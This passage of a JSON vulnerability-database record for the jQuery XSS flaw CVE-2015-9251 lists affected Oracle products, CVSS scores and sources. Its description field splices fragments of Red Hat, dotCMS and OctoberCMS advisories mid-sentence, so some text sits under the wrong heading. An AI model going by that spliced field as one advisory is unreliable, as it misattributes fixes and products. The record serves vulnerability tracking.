"version": "8.0.2"
},
{
"_id": null,
"model": "retail workforce management software",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "1.60.9"
},
{
"_id": null,
"model": "communications webrtc session controller",
"scope": "lt",
"trust": 1.0,
"vendor": "oracle",
"version": "7.2"
},
{
"_id": null,
"model": "financial services hedge management and ifrs valuations",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.7"
},
{
"_id": null,
"model": "enterprise operations monitor",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "4.0"
},
{
"_id": null,
"model": "healthcare foundation",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "7.2"
},
{
"_id": null,
"model": "webcenter sites",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "11.1.1.8.0"
},
{
"_id": null,
"model": "retail workforce management software",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "1.64.0"
},
{
"_id": null,
"model": "financial services data integration hub",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.5"
},
{
"_id": null,
"model": "financial services analytical applications infrastructure",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.7"
},
{
"_id": null,
"model": "financial services funds transfer pricing",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.4"
},
{
"_id": null,
"model": "primavera unifier",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "16.2"
},
{
"_id": null,
"model": "primavera unifier",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "18.8"
},
{
"_id": null,
"model": "service bus",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.1.3.0.0"
},
{
"_id": null,
"model": "financial services liquidity risk management",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.2"
},
{
"_id": null,
"model": "siebel ui framework",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "18.11"
},
{
"_id": null,
"model": "financial services analytical applications infrastructure",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "7.3.3"
},
{
"_id": null,
"model": "business process management suite",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.1.3.0.0"
},
{
"_id": null,
"model": "financial services liquidity risk management",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.6"
},
{
"_id": null,
"model": "jdeveloper",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "11.1.1.9.0"
},
{
"_id": null,
"model": "financial services hedge management and ifrs valuations",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.4"
},
{
"_id": null,
"model": "communications services gatekeeper",
"scope": "lt",
"trust": 1.0,
"vendor": "oracle",
"version": "6.1.0.4.0"
},
{
"_id": null,
"model": "financial services analytical applications infrastructure",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.0"
},
{
"_id": null,
"model": "insurance insbridge rating and underwriting",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "5.2"
},
{
"_id": null,
"model": "jd edwards enterpriseone tools",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "9.2"
},
{
"_id": null,
"model": "enterprise manager ops center",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.3.3"
},
{
"_id": null,
"model": "real-time scheduler",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "2.3.0"
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2015-9251"
}
]
},
"credits": {
"_id": null,
"data": "Red Hat",
"sources": [
{
"db": "PACKETSTORM",
"id": "159852"
},
{
"db": "PACKETSTORM",
"id": "170821"
},
{
"db": "PACKETSTORM",
"id": "170817"
},
{
"db": "PACKETSTORM",
"id": "159876"
},
{
"db": "PACKETSTORM",
"id": "159353"
},
{
"db": "PACKETSTORM",
"id": "156941"
}
],
"trust": 0.6
},
"cve": "CVE-2015-9251",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CVE-2015-9251",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.0,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "VHN-87212",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.8,
"id": "CVE-2015-9251",
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2015-9251",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-87212",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-87212"
},
{
"db": "NVD",
"id": "CVE-2015-9251"
}
]
},
"description": {
"_id": null,
"data": "jQuery before 3.0.0 is vulnerable to Cross-site Scripting (XSS) attacks when a cross-domain Ajax request is performed without the dataType option, causing text/javascript responses to be executed. jQuery is an open source, cross-browser JavaScript library developed by American John Resig programmers. The library simplifies the operation between HTML and JavaScript, and has the characteristics of modularization and plug-in extension. A cross-site scripting vulnerability exists in jQuery versions prior to 3.0.0. The vulnerability stems from the lack of correct validation of client data in WEB applications. An attacker could exploit this vulnerability to execute client code. 8) - aarch64, noarch, ppc64le, s390x, x86_64\n\n3. Description:\n\nThe Public Key Infrastructure (PKI) Core contains fundamental packages\nrequired by Red Hat Certificate System. \n1732565 - CVE-2019-10221 pki-core: Reflected XSS in getcookies?url= endpoint in CA\n1732981 - When nuxwdog is enabled pkidaemon status shows instances as stopped. Description:\n\nRed Hat JBoss Enterprise Application Platform 7 is a platform for Java\napplications based on the WildFly application runtime. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. JIRA issues fixed (https://issues.jboss.org/):\n\nJBEAP-23864 - (7.4.z) Upgrade xmlsec from 2.1.7.redhat-00001 to 2.2.3.redhat-00001\nJBEAP-23865 - [GSS](7.4.z) Upgrade Apache CXF from 3.3.13.redhat-00001 to 3.4.10.redhat-00001\nJBEAP-23866 - (7.4.z) Upgrade wss4j from 2.2.7.redhat-00001 to 2.3.3.redhat-00001\nJBEAP-23926 - Tracker bug for the EAP 7.4.9 release for RHEL-7\nJBEAP-24055 - (7.4.z) Upgrade HAL from 3.3.15.Final-redhat-00001 to 3.3.16.Final-redhat-00001\nJBEAP-24081 - (7.4.z) Upgrade Elytron from 1.15.14.Final-redhat-00001 to 1.15.15.Final-redhat-00001\nJBEAP-24095 - (7.4.z) Upgrade elytron-web from 1.9.2.Final-redhat-00001 to 1.9.3.Final-redhat-00001\nJBEAP-24100 - [GSS](7.4.z) Upgrade Undertow from 2.2.20.SP1-redhat-00001 to 2.2.22.SP3-redhat-00001\nJBEAP-24127 - (7.4.z) UNDERTOW-2123 - Update AsyncContextImpl.dispatch to use proper value\nJBEAP-24128 - (7.4.z) Upgrade Hibernate Search from 5.10.7.Final-redhat-00001 to 5.10.13.Final-redhat-00001\nJBEAP-24132 - [GSS](7.4.z) Upgrade Ironjacamar from 1.5.3.SP2-redhat-00001 to 1.5.10.Final-redhat-00001\nJBEAP-24147 - (7.4.z) Upgrade jboss-ejb-client from 4.0.45.Final-redhat-00001 to 4.0.49.Final-redhat-00001\nJBEAP-24167 - (7.4.z) Upgrade WildFly Core from 15.0.19.Final-redhat-00001 to 15.0.21.Final-redhat-00002\nJBEAP-24191 - [GSS](7.4.z) Upgrade remoting from 5.0.26.SP1-redhat-00001 to 5.0.27.Final-redhat-00001\nJBEAP-24195 - [GSS](7.4.z) Upgrade JSF API from 3.0.0.SP06-redhat-00001 to 3.0.0.SP07-redhat-00001\nJBEAP-24207 - (7.4.z) Upgrade Soteria from 1.0.1.redhat-00002 to 1.0.1.redhat-00003\nJBEAP-24248 - (7.4.z) ELY-2492 - Upgrade sshd-common in Elytron from 2.7.0 to 2.9.2\nJBEAP-24426 - (7.4.z) Upgrade Elytron from 1.15.15.Final-redhat-00001 to 1.15.16.Final-redhat-00001\nJBEAP-24427 - (7.4.z) Upgrade WildFly Core from 15.0.21.Final-redhat-00002 to 15.0.22.Final-redhat-00001\n\n7. \n1879604 - pkispawn logs files are empty\n\n6. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n==================================================================== \nRed Hat Security Advisory\n\nSynopsis: Moderate: ipa security, bug fix, and enhancement update\nAdvisory ID: RHSA-2020:3936-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://access.redhat.com/errata/RHSA-2020:3936\nIssue date: 2020-09-29\nCVE Names: CVE-2015-9251 CVE-2016-10735 CVE-2018-14040\n CVE-2018-14042 CVE-2018-20676 CVE-2018-20677\n CVE-2019-8331 CVE-2019-11358 CVE-2020-1722\n CVE-2020-11022\n====================================================================\n1. Summary:\n\nAn update for ipa is now available for Red Hat Enterprise Linux 7. \n\nRed Hat Product Security has rated this update as having a security impact\nof Moderate. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client (v. 7) - noarch, x86_64\nRed Hat Enterprise Linux Client Optional (v. 7) - noarch, x86_64\nRed Hat Enterprise Linux ComputeNode (v. 7) - noarch, x86_64\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - noarch, x86_64\nRed Hat Enterprise Linux Server (v. 7) - noarch, ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - noarch, x86_64\n\n3. Description:\n\nRed Hat Identity Management (IdM) is a centralized authentication, identity\nmanagement, and authorization solution for both traditional and cloud-based\nenterprise environments. \n\nThe following packages have been upgraded to a later upstream version: ipa\n(4.6.8). (BZ#1819725)\n\nSecurity Fix(es):\n\n* js-jquery: Cross-site scripting via cross-domain ajax requests\n(CVE-2015-9251)\n\n* bootstrap: XSS in the data-target attribute (CVE-2016-10735)\n\n* bootstrap: Cross-site Scripting (XSS) in the collapse data-parent\nattribute (CVE-2018-14040)\n\n* bootstrap: Cross-site Scripting (XSS) in the data-container property of\ntooltip. (CVE-2018-14042)\n\n* bootstrap: XSS in the tooltip data-viewport attribute (CVE-2018-20676)\n\n* bootstrap: XSS in the affix configuration target property\n(CVE-2018-20677)\n\n* bootstrap: XSS in the tooltip or popover data-template attribute\n(CVE-2019-8331)\n\n* js-jquery: prototype pollution in object\u0027s prototype leading to denial of\nservice or remote code execution or property injection (CVE-2019-11358)\n\n* jquery: Cross-site scripting due to improper injQuery.htmlPrefilter\nmethod (CVE-2020-11022)\n\n* ipa: No password length restriction leads to denial of service\n(CVE-2020-1722)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\nAdditional Changes:\n\nFor detailed information on changes in this release, see the Red Hat\nEnterprise Linux 7.9 Release Notes linked from the References section. \n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1399546 - CVE-2015-9251 js-jquery: Cross-site scripting via cross-domain ajax requests\n1404770 - ID Views: do not allow custom Views for the masters\n1545755 - ipa-replica-prepare should not update pki admin password. \n1601614 - CVE-2018-14040 bootstrap: Cross-site Scripting (XSS) in the collapse data-parent attribute\n1601617 - CVE-2018-14042 bootstrap: Cross-site Scripting (XSS) in the data-container property of tooltip. \n1668082 - CVE-2018-20676 bootstrap: XSS in the tooltip data-viewport attribute\n1668089 - CVE-2018-20677 bootstrap: XSS in the affix configuration target property\n1668097 - CVE-2016-10735 bootstrap: XSS in the data-target attribute\n1686454 - CVE-2019-8331 bootstrap: XSS in the tooltip or popover data-template attribute\n1701972 - CVE-2019-11358 js-jquery: prototype pollution in object\u0027s prototype leading to denial of service or remote code execution or property injection\n1754902 - Running ipa-server-install fails when RHEL 7.7 packages are installed on RHEL 7.6\n1755535 - ipa-advise on a RHEL7 IdM server is not able to generate a configuration script for a RHEL8 IdM client\n1756568 - ipa-server-certinstall man page does not match built-in help. \n1758406 - KRA authentication fails when IPA CA has custom Subject DN\n1769791 - Invisible part of notification area in Web UI intercepts clicks of some page elements\n1771356 - Default client configuration breaks ssh in FIPS mode. \n1780548 - Man page ipa-cacert-manage does not display correctly on RHEL\n1782587 - add \"systemctl restart sssd\" to warning message when adding trust agents to replicas\n1788718 - ipa-server-install incorrectly setting slew mode (-x) when setting up ntpd\n1788907 - Renewed certs are not picked up by IPA CAs\n1793071 - CVE-2020-1722 ipa: No password length restriction leads to denial of service\n1795890 - ipa-pkinit-manage enable fails on replica if it doesn\u0027t host the CA\n1801791 - Compatibility Schema difference in functionality for systems following RHEL 7.5 -\u003e 7.6 upgrade path as opposed to new RHEL 7.6 systems\n1817886 - ipa group-add-member: prevent adding IPA objects as external members\n1817918 - Secure tomcat AJP connector\n1817919 - Enable compat tree to provide information about AD users and groups on trust agents\n1817922 - covscan memory leaks report\n1817923 - IPA upgrade is failing with error \"Failed to get request: bus, object_path and dbus_interface must not be None.\"\n1817927 - host-add --password logs cleartext userpassword to Apache error log\n1819725 - Rebase IPA to latest 4.6.x version\n1825829 - ipa-advise on a RHEL7 IdM server generate a configuration script for client having hardcoded python3\n1828406 - CVE-2020-11022 jquery: Cross-site scripting due to improper injQuery.htmlPrefilter method\n1829787 - ipa service-del deletes the required principal when specified in lower/upper case\n1834385 - Man page syntax issue detected by rpminspect\n1842950 - ipa-adtrust-install fails when replica is offline\n\n6. Package List:\n\nRed Hat Enterprise Linux Client (v. 7):\n\nSource:\nipa-4.6.8-5.el7.src.rpm\n\nnoarch:\nipa-client-common-4.6.8-5.el7.noarch.rpm\nipa-common-4.6.8-5.el7.noarch.rpm\nipa-python-compat-4.6.8-5.el7.noarch.rpm\npython2-ipaclient-4.6.8-5.el7.noarch.rpm\npython2-ipalib-4.6.8-5.el7.noarch.rpm\n\nx86_64:\nipa-client-4.6.8-5.el7.x86_64.rpm\nipa-debuginfo-4.6.8-5.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nnoarch:\nipa-server-common-4.6.8-5.el7.noarch.rpm\nipa-server-dns-4.6.8-5.el7.noarch.rpm\npython2-ipaserver-4.6.8-5.el7.noarch.rpm\n\nx86_64:\nipa-debuginfo-4.6.8-5.el7.x86_64.rpm\nipa-server-4.6.8-5.el7.x86_64.rpm\nipa-server-trust-ad-4.6.8-5.el7.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode (v. 7):\n\nSource:\nipa-4.6.8-5.el7.src.rpm\n\nnoarch:\nipa-client-common-4.6.8-5.el7.noarch.rpm\nipa-common-4.6.8-5.el7.noarch.rpm\nipa-python-compat-4.6.8-5.el7.noarch.rpm\npython2-ipaclient-4.6.8-5.el7.noarch.rpm\npython2-ipalib-4.6.8-5.el7.noarch.rpm\n\nx86_64:\nipa-client-4.6.8-5.el7.x86_64.rpm\nipa-debuginfo-4.6.8-5.el7.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 7):\n\nnoarch:\nipa-server-common-4.6.8-5.el7.noarch.rpm\nipa-server-dns-4.6.8-5.el7.noarch.rpm\npython2-ipaserver-4.6.8-5.el7.noarch.rpm\n\nx86_64:\nipa-debuginfo-4.6.8-5.el7.x86_64.rpm\nipa-server-4.6.8-5.el7.x86_64.rpm\nipa-server-trust-ad-4.6.8-5.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\nipa-4.6.8-5.el7.src.rpm\n\nnoarch:\nipa-client-common-4.6.8-5.el7.noarch.rpm\nipa-common-4.6.8-5.el7.noarch.rpm\nipa-python-compat-4.6.8-5.el7.noarch.rpm\nipa-server-common-4.6.8-5.el7.noarch.rpm\nipa-server-dns-4.6.8-5.el7.noarch.rpm\npython2-ipaclient-4.6.8-5.el7.noarch.rpm\npython2-ipalib-4.6.8-5.el7.noarch.rpm\npython2-ipaserver-4.6.8-5.el7.noarch.rpm\n\nppc64:\nipa-client-4.6.8-5.el7.ppc64.rpm\nipa-debuginfo-4.6.8-5.el7.ppc64.rpm\n\nppc64le:\nipa-client-4.6.8-5.el7.ppc64le.rpm\nipa-debuginfo-4.6.8-5.el7.ppc64le.rpm\n\ns390x:\nipa-client-4.6.8-5.el7.s390x.rpm\nipa-debuginfo-4.6.8-5.el7.s390x.rpm\n\nx86_64:\nipa-client-4.6.8-5.el7.x86_64.rpm\nipa-debuginfo-4.6.8-5.el7.x86_64.rpm\nipa-server-4.6.8-5.el7.x86_64.rpm\nipa-server-trust-ad-4.6.8-5.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nipa-4.6.8-5.el7.src.rpm\n\nnoarch:\nipa-client-common-4.6.8-5.el7.noarch.rpm\nipa-common-4.6.8-5.el7.noarch.rpm\nipa-python-compat-4.6.8-5.el7.noarch.rpm\nipa-server-common-4.6.8-5.el7.noarch.rpm\nipa-server-dns-4.6.8-5.el7.noarch.rpm\npython2-ipaclient-4.6.8-5.el7.noarch.rpm\npython2-ipalib-4.6.8-5.el7.noarch.rpm\npython2-ipaserver-4.6.8-5.el7.noarch.rpm\n\nx86_64:\nipa-client-4.6.8-5.el7.x86_64.rpm\nipa-debuginfo-4.6.8-5.el7.x86_64.rpm\nipa-server-4.6.8-5.el7.x86_64.rpm\nipa-server-trust-ad-4.6.8-5.el7.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2015-9251\nhttps://access.redhat.com/security/cve/CVE-2016-10735\nhttps://access.redhat.com/security/cve/CVE-2018-14040\nhttps://access.redhat.com/security/cve/CVE-2018-14042\nhttps://access.redhat.com/security/cve/CVE-2018-20676\nhttps://access.redhat.com/security/cve/CVE-2018-20677\nhttps://access.redhat.com/security/cve/CVE-2019-8331\nhttps://access.redhat.com/security/cve/CVE-2019-11358\nhttps://access.redhat.com/security/cve/CVE-2020-1722\nhttps://access.redhat.com/security/cve/CVE-2020-11022\nhttps://access.redhat.com/security/updates/classification/#moderate\nhttps://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html/7.9_release_notes/index\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2020 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBX3Of/9zjgjWX9erEAQjmHBAAi+u4CgMbaduuYvMAMbNKqT/0X8Y02udQ\nmaW4rfZ6udfHWJ21h1VlD/INXHB3sBFC2vpXsgJD7dTkUsZYIx73LrQFkakTzIWc\nxSQalxNs+Fjh/ot/JMiKQzQUmZeu/vUYgVB81y+hczg5dys3q1mnu42GWe18sJIc\nFCY2R3mBTnFUZoc/3JDHeVRJU8eq51oqRgNaz+Fl+CoFkR81P6mD8wybIIAsBx14\nYkya/awQf+OuBCe5tqfTV1+KS2U4+tqiqapzALt7dhjfA9Jayc9/UvQjGCyrmGvP\n+BBBPSqGOS81jpPo0ouM3OtadWrGAWERMwtrR+POUp1rnMxy2kI0EpebnzSOtJy2\nxExPZtcTjjgWvIMDdrJJ5DXG6cP5j3GjyvFknmCtCqvXzo90gw73psi6roG+g/a8\nUyML+be8jnJK7571X3dz6OCYBExaHqM21ukUEfdvddszhw92J3fxmDm5+picETB9\ndZ++VtV1lCBOlKW1SDG/ggk7PeSRGTDL5IkekopO1w89r3QsfqyFudlsNT0dDgk7\n8Kzn8YpCWln1Kp0UbVushKRT+KllZRTKzXTBfiEWiYtQiwyL9zj/DrxagXXbiPe7\n5mZnk62sAdKya3On4ejgPQ8Nq8oKHzRfaig/CNaNiB00HgZcRdQokPQ9+DRnkdNS\nUR3S5ZAZvb8=SWQt\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. Hello,\n\nI identified several vulnerabilities in dotCMS v5.1.1 due to vulnerable\nopen source dependencies. \nThe purpose of this text-only errata is to inform you about the security\nissues fixed in this release. \n\nSecurity Fix(es):\n\n* HTTP/2: flood using PING frames results in unbounded memory growth\n(CVE-2019-9512)\n\n* HTTP/2: flood using PRIORITY frames results in excessive resource\nconsumption (CVE-2019-9513)\n\n* HTTP/2: flood using HEADERS frames results in unbounded memory growth\n(CVE-2019-9514)\n\n* HTTP/2: flood using SETTINGS frames results in unbounded memory growth\n(CVE-2019-9515)\n\n* HTTP/2: 0-length headers lead to denial of service (CVE-2019-9516)\n\n* HTTP/2: request for large response leads to denial of service\n(CVE-2019-9517)\n\n* HTTP/2: flood using empty frames results in excessive resource\nconsumption (CVE-2019-9518)\n\n* infinispan: invokeAccessibly method from ReflectionUtil class allows to\ninvoke private methods (CVE-2019-10174)\n\n* spring-security-core: mishandling of user passwords allows logging in\nwith a password of NULL (CVE-2019-11272)\n\n* jackson-databind: failure to block the logback-core class from\npolymorphic deserialization leading to remote code execution\n(CVE-2019-12384)\n\n* jackson-databind: default typing mishandling leading to remote code\nexecution (CVE-2019-14379)\n\n* xmlrpc: Deserialization of server-side exception from faultCause in\nXMLRPC error response (CVE-2019-17570)\n\n* js-jquery: Cross-site scripting via cross-domain ajax requests\n(CVE-2015-9251)\n\n* logback: Serialization vulnerability in SocketServer and\nServerSocketReceiver (CVE-2017-5929)\n\n* js-jquery: XSS in responses from cross-origin ajax requests\n(CVE-2017-16012)\n\n* apache-commons-compress: ZipArchiveInputStream.read() fails to identify\ncorrect EOF allowing for DoS via crafted zip (CVE-2018-11771)\n\n* spring-data-api: potential information disclosure through maliciously\ncrafted example value in ExampleMatcher (CVE-2019-3802)\n\n* undertow: leak credentials to log files\nUndertowLogger.REQUEST_LOGGER.undertowRequestFailed (CVE-2019-3888)\n\n* shiro: Cookie padding oracle vulnerability with default configuration\n(CVE-2019-12422)\n\n* jackson-databind: polymorphic typing issue allows attacker to read\narbitrary local files on the server via crafted JSON message. Solution:\n\nBefore applying the update, back up your existing installation, including\nall applications, configuration files, databases and database settings, and\nso on. \n\nInstallation instructions are available from the Fuse 7.6.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.6/\n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n1399546 - CVE-2015-9251 js-jquery: Cross-site scripting via cross-domain ajax requests\n1432858 - CVE-2017-5929 logback: Serialization vulnerability in SocketServer and ServerSocketReceiver\n1591854 - CVE-2017-16012 js-jquery: XSS in responses from cross-origin ajax requests\n1618573 - CVE-2018-11771 apache-commons-compress: ZipArchiveInputStream.read() fails to identify correct EOF allowing for DoS via crafted zip\n1643043 - CVE-2018-15756 springframework: DoS Attack via Range Requests\n1693777 - CVE-2019-3888 undertow: leak credentials to log files UndertowLogger.REQUEST_LOGGER.undertowRequestFailed\n1703469 - CVE-2019-10174 infinispan: invokeAccessibly method from ReflectionUtil class allows to invoke private methods\n1709860 - CVE-2019-5427 c3p0: loading XML configuration leads to denial of service\n1713068 - CVE-2019-10184 undertow: Information leak in requests for directories without trailing slashes\n1725795 - CVE-2019-12814 jackson-databind: polymorphic typing issue allows attacker to read arbitrary local files on the server via crafted JSON message. \n1725807 - CVE-2019-12384 jackson-databind: failure to block the logback-core class from polymorphic deserialization leading to remote code execution\n1728993 - CVE-2019-11272 spring-security-core: mishandling of user passwords allows logging in with a password of NULL\n1730316 - CVE-2019-3802 spring-data-api: potential information disclosure through maliciously crafted example value in ExampleMatcher\n1735645 - CVE-2019-9512 HTTP/2: flood using PING frames results in unbounded memory growth\n1735741 - CVE-2019-9513 HTTP/2: flood using PRIORITY frames results in excessive resource consumption\n1735744 - CVE-2019-9514 HTTP/2: flood using HEADERS frames results in unbounded memory growth\n1735745 - CVE-2019-9515 HTTP/2: flood using SETTINGS frames results in unbounded memory growth\n1735749 - CVE-2019-9518 HTTP/2: flood using empty frames results in excessive resource consumption\n1737517 - CVE-2019-14379 jackson-databind: default typing mishandling leading to remote code execution\n1741864 - CVE-2019-9516 HTTP/2: 0-length headers lead to denial of service\n1741868 - CVE-2019-9517 HTTP/2: request for large response leads to denial of service\n1752962 - CVE-2019-14439 jackson-databind: Polymorphic typing issue related to logback/JNDI\n1774726 - CVE-2019-12422 shiro: Cookie padding oracle vulnerability with default configuration\n1775193 - CVE-2019-17570 xmlrpc: Deserialization of server-side exception from faultCause in XMLRPC error response\n\n5. OctoberCMS is a CMS similar to WordPress, but with much less \u201cfluff\u201d. SECURELI.com\u0027s team identified the latest version of OctoberCMS relying on Bootstrap 3.3.7, jQuery 1.11.1, and jQuery 3.3.1. All of these dependencies are vulnerable. \n\n\n\n--------------------------------------------------\n/october/themes/demo/assets/vendor/bootstrap.js\n\n\nbootstrap 3.3.7 has known vulnerabilities\nseverity: high\nissue: 28236\nsummary: XSS in data-template, data-content and data-title properties of tooltip/popover\n\nCVE-2019-8331\nhttps://github.com/twbs/bootstrap/issues/28236 \nseverity: medium\nissue: 20184\nsummary: XSS in data-target property of scrollspy\n\nCVE-2018-14041\nhttps://github.com/twbs/bootstrap/issues/20184 \nseverity: medium\nissue: 20184\nsummary: XSS in collapse data-parent attribute\n\nCVE-2018-14040\nhttps://github.com/twbs/bootstrap/issues/20184 \nseverity: medium\nissue: 20184\nsummary: XSS in data-container property of tooltip\n\nCVE-2018-14042\nhttps://github.com/twbs/bootstrap/issues/20184 \n\n\n\n--------------------------------------------------\n/october/themes/demo/assets/vendor/jquery.js\n\njquery 1.11.1 has known vulnerabilities\nseverity: medium\nissue: 2432\nsummary: 3rd party CORS request may execute\n\nCVE-2015-9251\n\nhttps://github.com/jquery/jquery/issues/2432\nhttp://blog.jquery.com/2016/01/08/jquery-2-2-and-1-12-released/\nhttps://nvd.nist.gov/vuln/detail/CVE-2015-9251\nhttp://research.insecurelabs.org/jquery/test/ \nseverity: medium\n\nCVE-2015-9251\nissue: 11974\nsummary: parseHTML() executes scripts in event handlers\n\nhttps://bugs.jquery.com/ticket/11974\nhttps://nvd.nist.gov/vuln/detail/CVE-2015-9251\nhttp://research.insecurelabs.org/jquery/test/ \nseverity: low\n\nCVE-2019-11358\nsummary: jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles jQuery.extend(true, {}, \u2026) because of Object.prototype pollution\n\nhttps://blog.jquery.com/2019/04/10/jquery-3-4-0-released/\nhttps://nvd.nist.gov/vuln/detail/CVE-2019-11358\nhttps://github.com/jquery/jquery/commit/753d591aea698e57d6db58c9f722cd0808619b1b \n\n\n\n--------------------------------------------------\n/october/modules/backend/assets/js/vendor/jquery-and-migrate.min.js\n\njquery 3.3.1 has known vulnerabilities\nseverity: low\n\nCVE-2019-11358\nsummary: jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles jQuery.extend(true, {}, \u2026) because of Object.prototype pollution\n\nhttps://blog.jquery.com/2019/04/10/jquery-3-4-0-released/\nhttps://nvd.nist.gov/vuln/detail/CVE-2019-11358\nhttps://github.com/jquery/jquery/commit/753d591aea698e57d6db58c9f722cd0808619b1b \n\nAll of these vulnerabilities were identified using RetireJS (https://retirejs.github.io/retire.js/), which identifies open source dependency vulnerabilities. \n\n\n\nResearch provided by SECURELI.com\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2015-9251"
},
{
"db": "VULHUB",
"id": "VHN-87212"
},
{
"db": "PACKETSTORM",
"id": "159852"
},
{
"db": "PACKETSTORM",
"id": "170821"
},
{
"db": "PACKETSTORM",
"id": "170817"
},
{
"db": "PACKETSTORM",
"id": "159876"
},
{
"db": "PACKETSTORM",
"id": "159353"
},
{
"db": "PACKETSTORM",
"id": "152787"
},
{
"db": "PACKETSTORM",
"id": "156941"
},
{
"db": "PACKETSTORM",
"id": "156743"
}
],
"trust": 1.71
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2015-9251",
"trust": 1.9
},
{
"db": "PACKETSTORM",
"id": "156743",
"trust": 1.2
},
{
"db": "PACKETSTORM",
"id": "152787",
"trust": 1.2
},
{
"db": "PACKETSTORM",
"id": "153237",
"trust": 1.1
},
{
"db": "TENABLE",
"id": "TNS-2019-08",
"trust": 1.1
},
{
"db": "ICS CERT",
"id": "ICSA-18-212-04",
"trust": 1.1
},
{
"db": "PULSESECURE",
"id": "SA44601",
"trust": 1.1
},
{
"db": "BID",
"id": "105658",
"trust": 1.1
},
{
"db": "PACKETSTORM",
"id": "159353",
